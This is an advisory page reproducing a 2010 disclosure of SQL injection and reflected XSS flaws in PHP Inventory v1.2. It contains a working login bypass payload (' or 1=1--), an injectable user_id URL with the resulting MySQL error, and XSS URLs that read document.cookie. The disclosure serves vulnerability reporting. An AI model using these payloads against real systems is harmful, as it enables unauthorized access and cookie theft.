PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerabiity

2010-01-12 / 2010-01-13
Credit: mr_me
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

################################################################# # # PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerabiity # Found By: mr_me # Download: http://www.phpwares.com/content/php-inventory # Tested On: Windows Vista # Note: For educational purposes only # ################################################################# First of all lets login to admin with: http://[server]/php-inventory/index.php username: ' or 1=1-- password: ' or 1=1-- The app is riddled with SQL Injection. For example: http://[server]/php-inventory/index.php?sub=users&action=details&user_id=[SQLI] SELECT * FROM `site_users` WHERE `user_id`='1003''You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1003''' at line 1 This of course means you can do some slightly dodgy refected XSS: http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)</script> I leave the exploiting up to the reader.

Referencje:

http://xforce.iss.net/xforce/xfdb/54666
http://www.exploit-db.com/exploits/10370
http://secunia.com/advisories/37672
http://packetstormsecurity.org/0912-exploits/phpinventory-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top